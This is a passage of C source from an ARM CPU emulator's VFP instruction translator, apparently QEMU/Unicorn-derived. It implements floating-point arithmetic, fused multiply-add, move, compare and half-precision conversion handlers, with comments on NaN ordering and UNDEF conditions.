TCGv_i32 vm); typedef void VFPGen2OpDPFn(TCGContext *, TCGv_i64 vd, TCGv_i64 vm); /* * Return true if the specified S reg is in a scalar bank * (ie if it is s0..s7) */ static inline bool vfp_sreg_is_scalar(int reg) { return (reg & 0x18) == 0; } /* * Return true if the specified D reg is in a scalar bank * (ie if it is d0..d3 or d16..d19) */ static inline bool vfp_dreg_is_scalar(int reg) { return (reg & 0xc) == 0; } /* * Advance the S reg number forwards by delta within its bank * (ie increment the low 3 bits but leave the rest the same) */ static inline int vfp_advance_sreg(int reg, int delta) { return ((reg + delta) & 0x7) | (reg & ~0x7); } /* * Advance the D reg number forwards by delta within its bank * (ie increment the low 2 bits but leave the rest the same) */ static inline int vfp_advance_dreg(int reg, int delta) { return ((reg + delta) & 0x3) | (reg & ~0x3); } /* * Perform a 3-operand VFP data processing instruction. 
fn is the * callback to do the actual operation; this function deals with the * code to handle looping around for VFP vector processing. */ static bool do_vfp_3op_sp(DisasContext *s, VFPGen3OpSPFn *fn, int vd, int vn, int vm, bool reads_vd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 f0, f1, fd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; if (vfp_sreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i32(tcg_ctx); f1 = tcg_temp_new_i32(tcg_ctx); fd = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, 0); neon_load_reg32(tcg_ctx, f0, vn); neon_load_reg32(tcg_ctx, f1, vm); for (;;) { if (reads_vd) { neon_load_reg32(tcg_ctx, fd, vd); } fn(tcg_ctx, fd, f0, f1, fpst); neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); vn = vfp_advance_sreg(vn, delta_d); neon_load_reg32(tcg_ctx, f0, vn); if (delta_m) { vm = vfp_advance_sreg(vm, delta_m); neon_load_reg32(tcg_ctx, f1, vm); } } tcg_temp_free_i32(tcg_ctx, f0); tcg_temp_free_i32(tcg_ctx, f1); tcg_temp_free_i32(tcg_ctx, fd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool do_vfp_3op_dp(DisasContext *s, VFPGen3OpDPFn *fn, int vd, int vn, int vm, bool reads_vd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 f0, f1, fd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && ((vd | vn | vm) & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. 
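 * A destination register in a scalar bank forces a scalar operation
 * regardless of LEN; otherwise the operation loops over the short
 * vector, and a scalar vm (delta_m == 0) supplies the same second
 * operand to every element ("mixed scalar/vector").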
*/ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; if (vfp_dreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i64(tcg_ctx); f1 = tcg_temp_new_i64(tcg_ctx); fd = tcg_temp_new_i64(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, 0); neon_load_reg64(tcg_ctx, f0, vn); neon_load_reg64(tcg_ctx, f1, vm); for (;;) { if (reads_vd) { neon_load_reg64(tcg_ctx, fd, vd); } fn(tcg_ctx, fd, f0, f1, fpst); neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); vn = vfp_advance_dreg(vn, delta_d); neon_load_reg64(tcg_ctx, f0, vn); if (delta_m) { vm = vfp_advance_dreg(vm, delta_m); neon_load_reg64(tcg_ctx, f1, vm); } } tcg_temp_free_i64(tcg_ctx, f0); tcg_temp_free_i64(tcg_ctx, f1); tcg_temp_free_i64(tcg_ctx, fd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool do_vfp_2op_sp(DisasContext *s, VFPGen2OpSPFn *fn, int vd, int vm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 f0, fd; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; if (vfp_sreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i32(tcg_ctx); fd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, f0, vm); for (;;) { fn(tcg_ctx, fd, f0); neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } if (delta_m == 0) { /* single source one-many */ while (veclen--) { vd = vfp_advance_sreg(vd, delta_d); neon_store_reg32(tcg_ctx, fd, vd); } break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); vm = vfp_advance_sreg(vm, delta_m); neon_load_reg32(tcg_ctx, f0, vm); } tcg_temp_free_i32(tcg_ctx, f0); tcg_temp_free_i32(tcg_ctx, fd); return true; } static bool do_vfp_2op_dp(DisasContext *s, VFPGen2OpDPFn *fn, int vd, int vm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_m = 0; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 f0, fd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && ((vd | vm) & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. 
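 * For 2-op insns the scalar-vm case is the "one-to-many" form: the
 * result is computed once and then replicated into each remaining
 * destination element (the delta_m == 0 path in the loop below).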
*/ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; if (vfp_dreg_is_scalar(vm)) { /* mixed scalar/vector */ delta_m = 0; } else { /* vector */ delta_m = delta_d; } } } f0 = tcg_temp_new_i64(tcg_ctx); fd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, f0, vm); for (;;) { fn(tcg_ctx, fd, f0); neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } if (delta_m == 0) { /* single source one-many */ while (veclen--) { vd = vfp_advance_dreg(vd, delta_d); neon_store_reg64(tcg_ctx, fd, vd); } break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); vm = vfp_advance_dreg(vm, delta_m); neon_load_reg64(tcg_ctx, f0, vm); } tcg_temp_free_i64(tcg_ctx, f0); tcg_temp_free_i64(tcg_ctx, fd); return true; } static void gen_VMLA_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* Note that order of inputs to the add matters for NaNs */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VMLA_sp(DisasContext *s, arg_VMLA_sp *a) { return do_vfp_3op_sp(s, gen_VMLA_sp, a->vd, a->vn, a->vm, true); } static void gen_VMLA_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* Note that order of inputs to the add matters for NaNs */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VMLA_dp(DisasContext *s, arg_VMLA_dp *a) { return do_vfp_3op_dp(s, gen_VMLA_dp, a->vd, a->vn, a->vm, true); } static void gen_VMLS_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* * VMLS: vd = vd + -(vn * vm) * Note that order of inputs to the add matters for NaNs. */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, tmp, tmp); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VMLS_sp(DisasContext *s, arg_VMLS_sp *a) { return do_vfp_3op_sp(s, gen_VMLS_sp, a->vd, a->vn, a->vm, true); } static void gen_VMLS_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* * VMLS: vd = vd + -(vn * vm) * Note that order of inputs to the add matters for NaNs. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, tmp, tmp); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VMLS_dp(DisasContext *s, arg_VMLS_dp *a) { return do_vfp_3op_dp(s, gen_VMLS_dp, a->vd, a->vn, a->vm, true); } static void gen_VNMLS_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* * VNMLS: -fd + (fn * fm) * Note that it isn't valid to replace (-A + B) with (B - A) or similar * plausible looking simplifications because this will give wrong results * for NaNs.
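 * For example, if fd is a NaN, VNMLS must return that NaN with its
 * sign bit flipped by the explicit negation; rewriting the operation
 * as (fn * fm) - fd would propagate fd with its sign unchanged.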
*/ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, vd, vd); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VNMLS_sp(DisasContext *s, arg_VNMLS_sp *a) { return do_vfp_3op_sp(s, gen_VNMLS_sp, a->vd, a->vn, a->vm, true); } static void gen_VNMLS_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* * VNMLS: -fd + (fn * fm) * Note that it isn't valid to replace (-A + B) with (B - A) or similar * plausible looking simplifications because this will give wrong results * for NaNs. */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, vd, vd); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VNMLS_dp(DisasContext *s, arg_VNMLS_dp *a) { return do_vfp_3op_dp(s, gen_VNMLS_dp, a->vd, a->vn, a->vm, true); } static void gen_VNMLA_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* VNMLA: -fd + -(fn * fm) */ TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_muls(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, tmp, tmp); gen_helper_vfp_negs(tcg_ctx, vd, vd); gen_helper_vfp_adds(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i32(tcg_ctx, tmp); } static bool trans_VNMLA_sp(DisasContext *s, arg_VNMLA_sp *a) { return do_vfp_3op_sp(s, gen_VNMLA_sp, a->vd, a->vn, a->vm, true); } static void gen_VNMLA_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* VNMLA: -fd + -(fn * fm) */ TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_muld(tcg_ctx, tmp, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, tmp, tmp); gen_helper_vfp_negd(tcg_ctx, vd, vd); gen_helper_vfp_addd(tcg_ctx, vd, vd, tmp, fpst); tcg_temp_free_i64(tcg_ctx, tmp); } static bool trans_VNMLA_dp(DisasContext *s, arg_VNMLA_dp *a) { return do_vfp_3op_dp(s, gen_VNMLA_dp, a->vd, a->vn, a->vm, true); } static bool trans_VMUL_sp(DisasContext *s, arg_VMUL_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_muls, a->vd, a->vn, a->vm, false); } static bool trans_VMUL_dp(DisasContext *s, arg_VMUL_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_muld, a->vd, a->vn, a->vm, false); } static void gen_VNMUL_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst) { /* VNMUL: -(fn * fm) */ gen_helper_vfp_muls(tcg_ctx, vd, vn, vm, fpst); gen_helper_vfp_negs(tcg_ctx, vd, vd); } static bool trans_VNMUL_sp(DisasContext *s, arg_VNMUL_sp *a) { return do_vfp_3op_sp(s, gen_VNMUL_sp, a->vd, a->vn, a->vm, false); } static void gen_VNMUL_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst) { /* VNMUL: -(fn * fm) */ gen_helper_vfp_muld(tcg_ctx, vd, vn, vm, fpst); gen_helper_vfp_negd(tcg_ctx, vd, vd); } static bool trans_VNMUL_dp(DisasContext *s, arg_VNMUL_dp *a) { return do_vfp_3op_dp(s, gen_VNMUL_dp, a->vd, a->vn, a->vm, false); } static bool trans_VADD_sp(DisasContext *s, arg_VADD_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_adds, a->vd, a->vn, a->vm, false); } static bool trans_VADD_dp(DisasContext *s, arg_VADD_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_addd, a->vd, a->vn, a->vm, false); } static bool trans_VSUB_sp(DisasContext *s, arg_VSUB_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_subs, a->vd, a->vn, a->vm, false); } static bool trans_VSUB_dp(DisasContext *s, arg_VSUB_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_subd, a->vd, a->vn, a->vm, false); } static bool
trans_VDIV_sp(DisasContext *s, arg_VDIV_sp *a) { return do_vfp_3op_sp(s, gen_helper_vfp_divs, a->vd, a->vn, a->vm, false); } static bool trans_VDIV_dp(DisasContext *s, arg_VDIV_dp *a) { return do_vfp_3op_dp(s, gen_helper_vfp_divd, a->vd, a->vn, a->vm, false); } static bool trans_VMINNM_sp(DisasContext *s, arg_VMINNM_sp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_sp(s, gen_helper_vfp_minnums, a->vd, a->vn, a->vm, false); } static bool trans_VMAXNM_sp(DisasContext *s, arg_VMAXNM_sp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_sp(s, gen_helper_vfp_maxnums, a->vd, a->vn, a->vm, false); } static bool trans_VMINNM_dp(DisasContext *s, arg_VMINNM_dp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_dp(s, gen_helper_vfp_minnumd, a->vd, a->vn, a->vm, false); } static bool trans_VMAXNM_dp(DisasContext *s, arg_VMAXNM_dp *a) { if (!dc_isar_feature(aa32_vminmaxnm, s)) { return false; } return do_vfp_3op_dp(s, gen_helper_vfp_maxnumd, a->vd, a->vn, a->vm, false); } static bool do_vfm_sp(DisasContext *s, arg_VFMA_sp *a, bool neg_n, bool neg_d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* * VFNMA : fd = muladd(-fd, fn, fm) * VFNMS : fd = muladd(-fd, -fn, fm) * VFMA : fd = muladd( fd, fn, fm) * VFMS : fd = muladd( fd, -fn, fm) * * These are fused multiply-add, and must be done as one floating * point operation with no rounding between the multiplication and * addition steps. NB that doing the negations here as separate * steps is correct : an input NaN should come out with its sign * bit flipped if it is a negated-input. */ TCGv_ptr fpst; TCGv_i32 vn, vm, vd; /* * Present in VFPv4 only. * Note that we can't rely on the SIMDFMAC check alone, because * in a Neon-no-VFP core that ID register field will be non-zero. */ if (!dc_isar_feature(aa32_simdfmac, s) || !dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* * In v7A, UNPREDICTABLE with non-zero vector length/stride; from * v8A, must UNDEF. We choose to UNDEF for both v7A and v8A. 
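 *
 * The computation itself is a single call to the fused muladd helper,
 * vd = (vn * vm) + vd with one final rounding; the neg_n and neg_d
 * flags only control the explicit negations applied to vn and vd
 * before that call.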
*/ if (s->vec_len != 0 || s->vec_stride != 0) { return false; } if (!vfp_access_check(s)) { return true; } vn = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vn, a->vn); neon_load_reg32(tcg_ctx, vm, a->vm); if (neg_n) { /* VFNMS, VFMS */ gen_helper_vfp_negs(tcg_ctx, vn, vn); } neon_load_reg32(tcg_ctx, vd, a->vd); if (neg_d) { /* VFNMA, VFNMS */ gen_helper_vfp_negs(tcg_ctx, vd, vd); } fpst = get_fpstatus_ptr(tcg_ctx, 0); gen_helper_vfp_muladds(tcg_ctx, vd, vn, vm, vd, fpst); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, vn); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i32(tcg_ctx, vd); return true; } static bool trans_VFMA_sp(DisasContext *s, arg_VFMA_sp *a) { return do_vfm_sp(s, a, false, false); } static bool trans_VFMS_sp(DisasContext *s, arg_VFMS_sp *a) { return do_vfm_sp(s, a, true, false); } static bool trans_VFNMA_sp(DisasContext *s, arg_VFNMA_sp *a) { return do_vfm_sp(s, a, false, true); } static bool trans_VFNMS_sp(DisasContext *s, arg_VFNMS_sp *a) { return do_vfm_sp(s, a, true, true); } static bool do_vfm_dp(DisasContext *s, arg_VFMA_dp *a, bool neg_n, bool neg_d) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* * VFNMA : fd = muladd(-fd, fn, fm) * VFNMS : fd = muladd(-fd, -fn, fm) * VFMA : fd = muladd( fd, fn, fm) * VFMS : fd = muladd( fd, -fn, fm) * * These are fused multiply-add, and must be done as one floating * point operation with no rounding between the multiplication and * addition steps. NB that doing the negations here as separate * steps is correct : an input NaN should come out with its sign * bit flipped if it is a negated-input. */ TCGv_ptr fpst; TCGv_i64 vn, vm, vd; /* * Present in VFPv4 only. * Note that we can't rely on the SIMDFMAC check alone, because * in a Neon-no-VFP core that ID register field will be non-zero. */ if (!dc_isar_feature(aa32_simdfmac, s) || !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* * In v7A, UNPREDICTABLE with non-zero vector length/stride; from * v8A, must UNDEF. We choose to UNDEF for both v7A and v8A. */ if (s->vec_len != 0 || s->vec_stride != 0) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vn | a->vm) & 0x10)) { return false; }
if (!vfp_access_check(s)) { return true; } vn = tcg_temp_new_i64(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vn, a->vn); neon_load_reg64(tcg_ctx, vm, a->vm); if (neg_n) { /* VFNMS, VFMS */ gen_helper_vfp_negd(tcg_ctx, vn, vn); } neon_load_reg64(tcg_ctx, vd, a->vd); if (neg_d) { /* VFNMA, VFNMS */ gen_helper_vfp_negd(tcg_ctx, vd, vd); } fpst = get_fpstatus_ptr(tcg_ctx, 0); gen_helper_vfp_muladdd(tcg_ctx, vd, vn, vm, vd, fpst); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, vn); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VFMA_dp(DisasContext *s, arg_VFMA_dp *a) { return do_vfm_dp(s, a, false, false); } static bool trans_VFMS_dp(DisasContext *s, arg_VFMS_dp *a) { return do_vfm_dp(s, a, true, false); } static bool trans_VFNMA_dp(DisasContext *s, arg_VFNMA_dp *a) { return do_vfm_dp(s, a, false, true); } static bool trans_VFNMS_dp(DisasContext *s, arg_VFNMS_dp *a) { return do_vfm_dp(s, a, true, true); } static bool trans_VMOV_imm_sp(DisasContext *s, arg_VMOV_imm_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i32 fd; uint32_t vd; vd = a->vd; if (!dc_isar_feature(aa32_fpsp_v3, s)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is. */ if (vfp_sreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = s->vec_stride + 1; } } fd = tcg_const_i32(tcg_ctx, vfp_expand_imm(MO_32, a->imm)); for (;;) { neon_store_reg32(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_sreg(vd, delta_d); } tcg_temp_free_i32(tcg_ctx, fd); return true; } static bool trans_VMOV_imm_dp(DisasContext *s, arg_VMOV_imm_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t delta_d = 0; int veclen = s->vec_len; TCGv_i64 fd; uint32_t vd; vd = a->vd; if (!dc_isar_feature(aa32_fpdp_v3, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (vd & 0x10)) { return false; } if (!dc_isar_feature(aa32_fpshvec, s) && (veclen != 0 || s->vec_stride != 0)) { return false; } if (!vfp_access_check(s)) { return true; } if (veclen > 0) { /* Figure out what type of vector operation this is.
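 * VMOV (immediate) has no vm operand, so only the destination can be
 * a short vector; the expanded immediate is stored to each element of
 * the destination in turn.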
*/ if (vfp_dreg_is_scalar(vd)) { /* scalar */ veclen = 0; } else { delta_d = (s->vec_stride >> 1) + 1; } } fd = tcg_const_i64(tcg_ctx, vfp_expand_imm(MO_64, a->imm)); for (;;) { neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); } tcg_temp_free_i64(tcg_ctx, fd); return true; } static bool trans_VMOV_reg_sp(DisasContext *s, arg_VMOV_reg_sp *a) { return do_vfp_2op_sp(s, tcg_gen_mov_i32, a->vd, a->vm); } static bool trans_VMOV_reg_dp(DisasContext *s, arg_VMOV_reg_dp *a) { return do_vfp_2op_dp(s, tcg_gen_mov_i64, a->vd, a->vm); } static bool trans_VABS_sp(DisasContext *s, arg_VABS_sp *a) { return do_vfp_2op_sp(s, gen_helper_vfp_abss, a->vd, a->vm); } static bool trans_VABS_dp(DisasContext *s, arg_VABS_dp *a) { return do_vfp_2op_dp(s, gen_helper_vfp_absd, a->vd, a->vm); } static bool trans_VNEG_sp(DisasContext *s, arg_VNEG_sp *a) { return do_vfp_2op_sp(s, gen_helper_vfp_negs, a->vd, a->vm); } static bool trans_VNEG_dp(DisasContext *s, arg_VNEG_dp *a) { return do_vfp_2op_dp(s, gen_helper_vfp_negd, a->vd, a->vm); } static void gen_VSQRT_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vm) { gen_helper_vfp_sqrts(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } static bool trans_VSQRT_sp(DisasContext *s, arg_VSQRT_sp *a) { return do_vfp_2op_sp(s, gen_VSQRT_sp, a->vd, a->vm); } static void gen_VSQRT_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vm) { gen_helper_vfp_sqrtd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } static bool trans_VSQRT_dp(DisasContext *s, arg_VSQRT_dp *a) { return do_vfp_2op_dp(s, gen_VSQRT_dp, a->vd, a->vm); } static bool trans_VCMP_sp(DisasContext *s, arg_VCMP_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd, vm; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* Vm/M bits must be zero for the Z variant */ if (a->z && a->vm != 0) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vd, a->vd); if (a->z) { tcg_gen_movi_i32(tcg_ctx, vm, 0); } else { neon_load_reg32(tcg_ctx, vm, a->vm); } if (a->e) { gen_helper_vfp_cmpes(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } else { gen_helper_vfp_cmps(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, vm); return true; } static bool trans_VCMP_dp(DisasContext *s, arg_VCMP_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd, vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* Vm/M bits must be zero for the Z variant */ if (a->z && a->vm != 0) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. 
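 * (aa32_simd_r32 is set when all 32 double-precision registers are
 * implemented; bit 4 of a D-register number is set exactly for D16-D31,
 * so masking the operand numbers with 0x10 catches any use of them.)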
*/ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i64(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vd, a->vd); if (a->z) { tcg_gen_movi_i64(tcg_ctx, vm, 0); } else { neon_load_reg64(tcg_ctx, vm, a->vm); } if (a->e) { gen_helper_vfp_cmped(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } else { gen_helper_vfp_cmpd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); return true; } static bool trans_VCVT_f32_f16(DisasContext *s, arg_VCVT_f32_f16 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fp16_spconv, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); /* The T bit tells us if we want the low or high 16 bits of Vm */ tcg_gen_ld16u_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vm, a->t)); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp, tmp, fpst, ahp_mode); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VCVT_f64_f16(DisasContext *s, arg_VCVT_f64_f16 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; TCGv_i64 vd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fp16_dpconv, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); /* The T bit tells us if we want the low or high 16 bits of Vm */ tcg_gen_ld16u_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vm, a->t)); vd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, vd, tmp, fpst, ahp_mode); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, 